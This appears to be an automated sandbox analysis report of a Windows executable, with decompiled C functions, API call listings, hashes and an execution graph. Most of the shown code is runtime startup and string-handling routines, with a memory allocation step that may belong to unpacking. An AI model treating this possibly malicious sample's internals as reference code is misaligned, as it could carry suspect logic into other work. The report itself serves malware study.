                                                                                    				WCHAR* _t9;
                                                                                    
                                                                                    				_t9 = _a4;
                                                                                    				_push( &(_t9[lstrlenW(_t9)]));
                                                                                    				_push(_t9);
                                                                                    				if( *(CharPrevW()) != 0x5c) {
                                                                                    					lstrcatW(_t9, 0x40a014);
                                                                                    				}
                                                                                    				return _t9;
                                                                                    			}




                                                                                    0x00405f38
                                                                                    0x00405f45
                                                                                    0x00405f46
                                                                                    0x00405f51
                                                                                    0x00405f59
                                                                                    0x00405f59
                                                                                    0x00405f61

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3081826266
                                                                                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                    • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                    • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 89%
                                                                                    			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                    				int _t15;
                                                                                    				long _t16;
                                                                                    
                                                                                    				_t15 = _a8;
                                                                                    				if(_t15 != 0x102) {
                                                                                    					if(_t15 != 0x200) {
                                                                                    						_t16 = _a16;
                                                                                    						L7:
                                                                                    						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                                                    							_push(_t16);
                                                                                    							_push(6);
                                                                                    							 *0x423734 = _t16;
                                                                                    							E00404FFF();
                                                                                    						}
                                                                                    						L11:
                                                                                    						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                                                    					}
                                                                                    					if(IsWindowVisible(_a4) == 0) {
                                                                                    						L10:
                                                                                    						_t16 = _a16;
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					_t16 = E00404F7F(_a4, 1);
                                                                                    					_t15 = 0x419;
                                                                                    					goto L7;
                                                                                    				}
                                                                                    				if(_a12 != 0x20) {
                                                                                    					goto L10;
                                                                                    				}
                                                                                    				E00404610(0x413);
                                                                                    				return 0;
                                                                                    			}





                                                                                    0x00405642
                                                                                    0x0040564c
                                                                                    0x00405668
                                                                                    0x0040568a
                                                                                    0x0040568d
                                                                                    0x00405693
                                                                                    0x0040569d
                                                                                    0x0040569e
                                                                                    0x004056a0
                                                                                    0x004056a6
                                                                                    0x004056a6
                                                                                    0x004056b0
                                                                                    0x00000000
                                                                                    0x004056be
                                                                                    0x00405675
                                                                                    0x004056ad
                                                                                    0x004056ad
                                                                                    0x00000000
                                                                                    0x004056ad
                                                                                    0x00405681
                                                                                    0x00405683
                                                                                    0x00000000
                                                                                    0x00405683
                                                                                    0x00405652
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405659
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                      • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                    • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                    • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                    • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                    				int _v8;
                                                                                    				int _t12;
                                                                                    				int _t14;
                                                                                    				int _t15;
                                                                                    				CHAR* _t17;
                                                                                    				CHAR* _t27;
                                                                                    
                                                                                    				_t12 = lstrlenA(_a8);
                                                                                    				_t27 = _a4;
                                                                                    				_v8 = _t12;
                                                                                    				while(lstrlenA(_t27) >= _v8) {
                                                                                    					_t14 = _v8;
                                                                                    					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                    					_t15 = lstrcmpiA(_t27, _a8);
                                                                                    					_t27[_v8] =  *(_t14 + _t27);
                                                                                    					if(_t15 == 0) {
                                                                                    						_t17 = _t27;
                                                                                    					} else {
                                                                                    						_t27 = CharNextA(_t27);
                                                                                    						continue;
                                                                                    					}
                                                                                    					L5:
                                                                                    					return _t17;
                                                                                    				}
                                                                                    				_t17 = 0;
                                                                                    				goto L5;
                                                                                    			}









                                                                                    0x004060cd
                                                                                    0x004060cf
                                                                                    0x004060d2
                                                                                    0x004060fe
                                                                                    0x004060d7
                                                                                    0x004060e0
                                                                                    0x004060e5
                                                                                    0x004060f0
                                                                                    0x004060f3
                                                                                    0x0040610f
                                                                                    0x004060f5
                                                                                    0x004060fc
                                                                                    0x00000000
                                                                                    0x004060fc
                                                                                    0x00406108
                                                                                    0x0040610c
                                                                                    0x0040610c
                                                                                    0x00406106
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                                    • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                    • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                    • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:17%
                                                                                    Dynamic/Decrypted Code Coverage:7.7%
                                                                                    Signature Coverage:6.8%
                                                                                    Total number of Nodes:1555
                                                                                    Total number of Limit Nodes:27
                                                                                    execution_graph 8787 4072c3 8788 4072cf __write 8787->8788 8789 4072e7 8788->8789 8791 4073d1 __write 8788->8791 8792 408bc0 _free 66 API calls 8788->8792 8790 4072f5 8789->8790 8793 408bc0 _free 66 API calls 8789->8793 8794 407303 8790->8794 8795 408bc0 _free 66 API calls 8790->8795 8792->8789 8793->8790 8796 407311 8794->8796 8797 408bc0 _free 66 API calls 8794->8797 8795->8794 8798 40731f 8796->8798 8800 408bc0 _free 66 API calls 8796->8800 8797->8796 8799 40732d 8798->8799 8801 408bc0 _free 66 API calls 8798->8801 8802 40733b 8799->8802 8803 408bc0 _free 66 API calls 8799->8803 8800->8798 8801->8799 8804 40734c 8802->8804 8805 408bc0 _free 66 API calls 8802->8805 8803->8802 8806 40a357 __lock 66 API calls 8804->8806 8805->8804 8807 407354 8806->8807 8808 407360 InterlockedDecrement 8807->8808 8809 407379 8807->8809 8808->8809 8810 40736b 8808->8810 8823 4073dd 8809->8823 8810->8809 8813 408bc0 _free 66 API calls 8810->8813 8813->8809 8814 40a357 __lock 66 API calls 8815 40738d 8814->8815 8817 40878f ___removelocaleref 8 API calls 8815->8817 8822 4073be 8815->8822 8820 4073a2 8817->8820 8819 408bc0 _free 66 API calls 8819->8791 8821 408828 ___freetlocinfo 66 API calls 8820->8821 8820->8822 8821->8822 8826 4073e9 8822->8826 8829 40a27e LeaveCriticalSection 8823->8829 8825 407386 8825->8814 8830 40a27e LeaveCriticalSection 8826->8830 8828 4073cb 8828->8819 8829->8825 8830->8828 9334 40588f 9341 406097 9334->9341 9336 4058a2 9339 408bc0 _free 66 API calls 9336->9339 9340 4058ad 9339->9340 9354 405fbd 9341->9354 9343 405894 9343->9336 9344 40a141 9343->9344 9345 40a14d __write 9344->9345 9346 40a357 __lock 66 API calls 9345->9346 9353 40a159 9346->9353 9347 40a1bf 9384 40a1d4 9347->9384 9349 40a1cb __write 9349->9336 9351 40a194 DeleteCriticalSection 9352 408bc0 _free 66 API calls 9351->9352 9352->9353 9353->9347 9353->9351 9371 40e7bf 9353->9371 9355 405fc9 __write 9354->9355 9356 40a357 __lock 66 API calls 9355->9356 9357 405fd8 9356->9357 9358 406070 9357->9358 9360 4058f0 _flsall 67 API calls 9357->9360 9363 405f75 101 API calls __fflush_nolock 9357->9363 9364 40605f 9357->9364 9367 40608e 9358->9367 9360->9357 9361 40607c __write 9361->9343 9363->9357 9365 40595e _flsall 2 API calls 9364->9365 9366 40606d 9365->9366 9366->9357 9370 40a27e LeaveCriticalSection 9367->9370 9369 406095 9369->9361 9370->9369 9372 40e7cb __write 9371->9372 9373 40e7f2 9372->9373 9374 40e7dd 9372->9374 9377 4058af __lock_file 67 API calls 9373->9377 9383 40e7ed __write 9373->9383 9375 40370a __free_osfhnd 66 API calls 9374->9375 9376 40e7e2 9375->9376 9378 4036b8 __cftoe_l 11 API calls 9376->9378 9379 40e80b 9377->9379 9378->9383 9387 40e752 9379->9387 9383->9353 9437 40a27e LeaveCriticalSection 9384->9437 9386 40a1db 9386->9349 9388 40e763 9387->9388 9389 40e777 9387->9389 9390 40370a __free_osfhnd 66 API calls 9388->9390 9392 405f0d __flush 97 API calls 9389->9392 9395 40e773 9389->9395 9391 40e768 9390->9391 9393 4036b8 __cftoe_l 11 API calls 9391->9393 9394 40e783 9392->9394 9393->9395 9406 40f116 9394->9406 9403 40e82b 9395->9403 9398 40573d __ftell_nolock 66 API calls 9399 40e791 9398->9399 9410 40ea85 9399->9410 9401 40e797 9401->9395 9402 408bc0 _free 66 API calls 9401->9402 9402->9395 9404 405922 __wfsopen 2 API calls 9403->9404 9405 40e831 9404->9405 9405->9383 9407 40e78b 9406->9407 9408 40f126 9406->9408 9407->9398 9408->9407 9409 408bc0 _free 66 API calls 9408->9409 9409->9407 9411 40ea91 __write 9410->9411 9412 40eab4 9411->9412 9413 40ea99 9411->9413 9415 40eac0 9412->9415 9419 40eafa 9412->9419 9414 40371d __free_osfhnd 66 API calls 9413->9414 9416 40ea9e 9414->9416 9417 40371d __free_osfhnd 66 API calls 9415->9417 9420 40370a __free_osfhnd 66 API calls 9416->9420 9418 40eac5 9417->9418 9421 40370a __free_osfhnd 66 API calls 9418->9421 9422 409b77 ___lock_fhandle 68 API calls 9419->9422 9428 40eaa6 __write 9420->9428 9423 40eacd 9421->9423 9424 40eb00 9422->9424 9425 4036b8 __cftoe_l 11 API calls 9423->9425 9426 40eb1a 9424->9426 9427 40eb0e 9424->9427 9425->9428 9430 40370a __free_osfhnd 66 API calls 9426->9430 9429 40e9e9 __close_nolock 69 API calls 9427->9429 9428->9401 9431 40eb14 9429->9431 9430->9431 9433 40eb41 9431->9433 9436 409c16 LeaveCriticalSection 9433->9436 9435 40eb47 9435->9428 9436->9435 9437->9386 7142 403253 7180 405990 7142->7180 7144 40325f GetStartupInfoW 7145 403273 HeapSetInformation 7144->7145 7147 40327e 7144->7147 7145->7147 7181 40756d HeapCreate 7147->7181 7148 4032cc 7149 4032d7 7148->7149 7286 40322a 7148->7286 7182 4073f2 GetModuleHandleW 7149->7182 7152 4032dd 7153 4032e8 __RTC_Initialize 7152->7153 7154 40322a _fast_error_exit 66 API calls 7152->7154 7207 405b7f GetStartupInfoW 7153->7207 7154->7153 7157 403302 GetCommandLineW 7220 407055 GetEnvironmentStringsW 7157->7220 7161 403312 7226 406fa7 GetModuleFileNameW 7161->7226 7163 40331c 7164 403327 7163->7164 7166 4069b9 __amsg_exit 66 API calls 7163->7166 7230 406d75 7164->7230 7166->7164 7167 40332d 7168 403338 7167->7168 7169 4069b9 __amsg_exit 66 API calls 7167->7169 7244 406798 7168->7244 7169->7168 7171 403340 7172 4069b9 __amsg_exit 66 API calls 7171->7172 7173 40334b __wwincmdln 7171->7173 7172->7173 7250 402571 6 API calls 7173->7250 7176 40337b 7304 40699b 7176->7304 7179 403380 __write 7180->7144 7181->7148 7183 407406 7182->7183 7184 40740f GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7182->7184 7307 40713f 7183->7307 7186 407459 TlsAlloc 7184->7186 7189 4074a7 TlsSetValue 7186->7189 7190 407568 7186->7190 7189->7190 7191 4074b8 7189->7191 7190->7152 7317 406741 7191->7317 7196 407500 DecodePointer 7199 407515 7196->7199 7197 407563 7198 40713f __mtterm 70 API calls 7197->7198 7198->7190 7199->7197 7326 408c3f 7199->7326 7202 407533 DecodePointer 7203 407544 7202->7203 7203->7197 7204 407548 7203->7204 7332 40717c 7204->7332 7206 407550 GetCurrentThreadId 7206->7190 7208 408c3f __calloc_crt 66 API calls 7207->7208 7217 405b9d 7208->7217 7209 405d48 GetStdHandle 7214 405d12 7209->7214 7210 408c3f __calloc_crt 66 API calls 7210->7217 7211 405dac SetHandleCount 7219 4032f6 7211->7219 7212 405d5a GetFileType 7212->7214 7213 405c92 7213->7214 7215 405cc9 InitializeCriticalSectionAndSpinCount 7213->7215 7216 405cbe GetFileType 7213->7216 7214->7209 7214->7211 7214->7212 7218 405d80 InitializeCriticalSectionAndSpinCount 7214->7218 7215->7213 7215->7219 7216->7213 7216->7215 7217->7210 7217->7213 7217->7214 7217->7219 7218->7214 7218->7219 7219->7157 7294 4069b9 7219->7294 7221 407066 7220->7221 7222 40706a 7220->7222 7221->7161 7223 408bfa __malloc_crt 66 API calls 7222->7223 7224 40708c _memmove 7223->7224 7225 407093 FreeEnvironmentStringsW 7224->7225 7225->7161 7227 406fdc _wparse_cmdline 7226->7227 7228 408bfa __malloc_crt 66 API calls 7227->7228 7229 40701f _wparse_cmdline 7227->7229 7228->7229 7229->7163 7231 406d8d _wcslen 7230->7231 7235 406d85 7230->7235 7232 408c3f __calloc_crt 66 API calls 7231->7232 7237 406db1 _wcslen 7232->7237 7233 406e07 7234 408bc0 _free 66 API calls 7233->7234 7234->7235 7235->7167 7236 408c3f __calloc_crt 66 API calls 7236->7237 7237->7233 7237->7235 7237->7236 7238 406e2d 7237->7238 7239 40b76e __wsetenvp 66 API calls 7237->7239 7241 406e44 7237->7241 7240 408bc0 _free 66 API calls 7238->7240 7239->7237 7240->7235 7242 403666 __invoke_watson 10 API calls 7241->7242 7243 406e50 7242->7243 7243->7167 7246 4067a6 __IsNonwritableInCurrentImage 7244->7246 7576 404f13 7246->7576 7247 4067c4 __initterm_e 7249 4067e5 __IsNonwritableInCurrentImage 7247->7249 7579 40b48e 7247->7579 7249->7171 7251 4025bb Sleep 7250->7251 7252 4025c8 7251->7252 7253 402643 RegisterWindowMessageW 7252->7253 7644 40318f 7252->7644 7254 402664 _memset 7253->7254 7694 4014ec GetSystemMetrics GetSystemMetrics 7254->7694 7259 402674 _memset 7262 402682 6 API calls 7259->7262 7260 4025eb 7660 402f66 7260->7660 7264 402708 MonitorFromRect GetMonitorInfoW 7262->7264 7266 402701 7262->7266 7263 4025f1 7265 403055 _fseek 101 API calls 7263->7265 7267 402748 CreateWindowExW 7264->7267 7268 4025fb VirtualAlloc 7265->7268 7266->7176 7301 40696f 7266->7301 7272 4027a2 7267->7272 7273 402795 ExitProcess 7267->7273 7673 402db5 7268->7673 7756 401abc 13 API calls 7272->7756 7276 4027a7 ShowWindow UpdateWindow DragAcceptFiles GetCommandLineW 7757 401f93 7276->7757 7280 402835 GetMessageW 7280->7266 7281 4027f8 IsDialogMessageW 7280->7281 7281->7280 7282 40280c TranslateAcceleratorW 7281->7282 7282->7280 7283 402821 TranslateMessage DispatchMessageW 7282->7283 7283->7280 7287 403238 7286->7287 7288 40323d 7286->7288 7290 406bac __FF_MSGBANNER 66 API calls 7287->7290 7289 4069fd __NMSG_WRITE 66 API calls 7288->7289 7291 403245 7289->7291 7290->7288 7292 406717 _doexit 3 API calls 7291->7292 7293 40324f 7292->7293 7293->7149 7295 406bac __FF_MSGBANNER 66 API calls 7294->7295 7296 4069c3 7295->7296 7297 4069fd __NMSG_WRITE 66 API calls 7296->7297 7298 4069cb 7297->7298 8746 406985 7298->8746 7302 40682f _doexit 66 API calls 7301->7302 7303 406980 7302->7303 7303->7176 7305 40682f _doexit 66 API calls 7304->7305 7306 4069a6 7305->7306 7306->7179 7308 407149 DecodePointer 7307->7308 7309 407158 7307->7309 7308->7309 7310 407169 TlsFree 7309->7310 7311 407177 7309->7311 7310->7311 7312 40a25b 7311->7312 7313 40a243 DeleteCriticalSection 7311->7313 7315 40a26d DeleteCriticalSection 7312->7315 7316 40740b 7312->7316 7345 408bc0 7313->7345 7315->7312 7316->7152 7371 4070f9 RtlEncodePointer 7317->7371 7319 406749 __init_pointers __initp_misc_winsig 7372 40b100 EncodePointer 7319->7372 7321 40676f EncodePointer EncodePointer EncodePointer EncodePointer 7322 40a1dd 7321->7322 7323 40a1e8 7322->7323 7324 40a1f2 InitializeCriticalSectionAndSpinCount 7323->7324 7325 4074fc 7323->7325 7324->7323 7324->7325 7325->7196 7325->7197 7327 408c48 7326->7327 7329 40752b 7327->7329 7330 408c66 Sleep 7327->7330 7373 40c55d 7327->7373 7329->7197 7329->7202 7331 408c7b 7330->7331 7331->7327 7331->7329 7384 405990 7332->7384 7334 407188 GetModuleHandleW 7385 40a357 7334->7385 7336 4071c6 InterlockedIncrement 7392 40721e 7336->7392 7339 40a357 __lock 64 API calls 7340 4071e7 7339->7340 7395 408700 InterlockedIncrement 7340->7395 7342 407205 7407 407227 7342->7407 7344 407212 __write 7344->7206 7346 408bf4 _free 7345->7346 7347 408bcb HeapFree 7345->7347 7346->7311 7347->7346 7348 408be0 7347->7348 7351 40370a 7348->7351 7354 407230 GetLastError 7351->7354 7353 40370f GetLastError 7353->7346 7368 40710b TlsGetValue 7354->7368 7357 40729d SetLastError 7357->7353 7358 408c3f __calloc_crt 62 API calls 7359 40725b 7358->7359 7359->7357 7360 407263 DecodePointer 7359->7360 7361 407278 7360->7361 7362 407294 7361->7362 7363 40727c 7361->7363 7365 408bc0 _free 62 API calls 7362->7365 7364 40717c __getptd_noexit 62 API calls 7363->7364 7366 407284 GetCurrentThreadId 7364->7366 7367 40729a 7365->7367 7366->7357 7367->7357 7369 407120 DecodePointer TlsSetValue 7368->7369 7370 40713b 7368->7370 7369->7370 7370->7357 7370->7358 7371->7319 7372->7321 7374 40c569 7373->7374 7378 40c584 7373->7378 7375 40c575 7374->7375 7374->7378 7377 40370a __free_osfhnd 65 API calls 7375->7377 7376 40c597 RtlAllocateHeap 7376->7378 7379 40c5be 7376->7379 7380 40c57a 7377->7380 7378->7376 7378->7379 7382 40b343 DecodePointer 7378->7382 7379->7327 7380->7327 7383 40b358 7382->7383 7383->7378 7384->7334 7386 40a36c 7385->7386 7387 40a37f EnterCriticalSection 7385->7387 7410 40a295 7386->7410 7387->7336 7389 40a372 7389->7387 7390 4069b9 __amsg_exit 65 API calls 7389->7390 7391 40a37e 7390->7391 7391->7387 7574 40a27e LeaveCriticalSection 7392->7574 7394 4071e0 7394->7339 7396 408721 7395->7396 7397 40871e InterlockedIncrement 7395->7397 7398 40872b InterlockedIncrement 7396->7398 7399 40872e 7396->7399 7397->7396 7398->7399 7400 408738 InterlockedIncrement 7399->7400 7401 40873b 7399->7401 7400->7401 7402 408745 InterlockedIncrement 7401->7402 7404 408748 7401->7404 7402->7404 7403 408761 InterlockedIncrement 7403->7404 7404->7403 7405 408771 InterlockedIncrement 7404->7405 7406 40877c InterlockedIncrement 7404->7406 7405->7404 7406->7342 7575 40a27e LeaveCriticalSection 7407->7575 7409 40722e 7409->7344 7411 40a2a1 __write 7410->7411 7412 40a2b1 7411->7412 7414 40a2c9 7411->7414 7437 406bac 7412->7437 7421 40a2d7 __write 7414->7421 7473 408bfa 7414->7473 7419 40a2f8 7424 40a357 __lock 65 API calls 7419->7424 7420 40a2e9 7423 40370a __free_osfhnd 65 API calls 7420->7423 7421->7389 7423->7421 7426 40a2ff 7424->7426 7428 40a332 7426->7428 7429 40a307 InitializeCriticalSectionAndSpinCount 7426->7429 7430 408bc0 _free 65 API calls 7428->7430 7431 40a317 7429->7431 7432 40a323 7429->7432 7430->7432 7433 408bc0 _free 65 API calls 7431->7433 7479 40a34e 7432->7479 7435 40a31d 7433->7435 7436 40370a __free_osfhnd 65 API calls 7435->7436 7436->7432 7482 40b7d1 7437->7482 7439 406bb3 7440 406bc0 7439->7440 7441 40b7d1 __FF_MSGBANNER 66 API calls 7439->7441 7442 4069fd __NMSG_WRITE 66 API calls 7440->7442 7445 406be2 7440->7445 7441->7440 7443 406bd8 7442->7443 7444 4069fd __NMSG_WRITE 66 API calls 7443->7444 7444->7445 7446 4069fd 7445->7446 7447 406a1e __NMSG_WRITE 7446->7447 7449 40b7d1 __FF_MSGBANNER 63 API calls 7447->7449 7469 406b3a 7447->7469 7451 406a38 7449->7451 7450 406baa 7470 406717 7450->7470 7452 406b49 GetStdHandle 7451->7452 7453 40b7d1 __FF_MSGBANNER 63 API calls 7451->7453 7456 406b57 _strlen 7452->7456 7452->7469 7454 406a49 7453->7454 7454->7452 7455 406a5b 7454->7455 7455->7469 7507 40b76e 7455->7507 7458 406b8d WriteFile 7456->7458 7456->7469 7458->7469 7460 406a87 GetModuleFileNameW 7461 406ab4 _wcslen 7460->7461 7462 406aa8 7460->7462 7464 403666 __invoke_watson 10 API calls 7461->7464 7466 40b611 63 API calls __NMSG_WRITE 7461->7466 7467 406b2a 7461->7467 7516 40b686 7461->7516 7463 40b76e __wsetenvp 63 API calls 7462->7463 7463->7461 7464->7461 7466->7461 7525 40b4a5 7467->7525 7543 40800d 7469->7543 7553 4066ec GetModuleHandleW 7470->7553 7475 408c03 7473->7475 7476 408c39 7475->7476 7477 408c1a Sleep 7475->7477 7556 40c4c9 7475->7556 7476->7419 7476->7420 7478 408c2f 7477->7478 7478->7475 7478->7476 7573 40a27e LeaveCriticalSection 7479->7573 7481 40a355 7481->7421 7483 40b7dd 7482->7483 7484 40370a __free_osfhnd 66 API calls 7483->7484 7485 40b7e7 7483->7485 7486 40b800 7484->7486 7485->7439 7489 4036b8 7486->7489 7492 40368b DecodePointer 7489->7492 7493 4036a0 7492->7493 7498 403666 7493->7498 7495 4036b7 7496 40368b __cftoe_l 10 API calls 7495->7496 7497 4036c4 7496->7497 7497->7439 7501 40353d 7498->7501 7502 40355c _memset __call_reportfault 7501->7502 7503 40357a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7502->7503 7504 403648 __call_reportfault 7503->7504 7505 40800d __cftoe_l 5 API calls 7504->7505 7506 403664 GetCurrentProcess TerminateProcess 7505->7506 7506->7495 7508 40b783 7507->7508 7509 40b77c 7507->7509 7510 40370a __free_osfhnd 66 API calls 7508->7510 7509->7508 7512 40b7a4 7509->7512 7515 40b788 7510->7515 7511 4036b8 __cftoe_l 11 API calls 7513 406a7c 7511->7513 7512->7513 7514 40370a __free_osfhnd 66 API calls 7512->7514 7513->7460 7513->7461 7514->7515 7515->7511 7520 40b698 7516->7520 7517 40b69c 7518 40b6a1 7517->7518 7519 40370a __free_osfhnd 66 API calls 7517->7519 7518->7461 7521 40b6b8 7519->7521 7520->7517 7520->7518 7523 40b6df 7520->7523 7522 4036b8 __cftoe_l 11 API calls 7521->7522 7522->7518 7523->7518 7524 40370a __free_osfhnd 66 API calls 7523->7524 7524->7521 7551 4070f9 RtlEncodePointer 7525->7551 7527 40b4cb 7528 40b558 7527->7528 7529 40b4db LoadLibraryW 7527->7529 7531 40b572 DecodePointer DecodePointer 7528->7531 7541 40b585 7528->7541 7530 40b4f0 GetProcAddress 7529->7530 7535 40b5f0 7529->7535 7534 40b506 7 API calls 7530->7534 7530->7535 7531->7541 7532 40b5e4 DecodePointer 7532->7535 7533 40b5bb DecodePointer 7533->7532 7537 40b5c2 7533->7537 7534->7528 7538 40b548 GetProcAddress EncodePointer 7534->7538 7536 40800d __cftoe_l 5 API calls 7535->7536 7539 40b60f 7536->7539 7537->7532 7540 40b5d5 DecodePointer 7537->7540 7538->7528 7539->7469 7540->7532 7542 40b5a8 7540->7542 7541->7532 7541->7533 7541->7542 7542->7532 7544 408015 7543->7544 7545 408017 IsDebuggerPresent 7543->7545 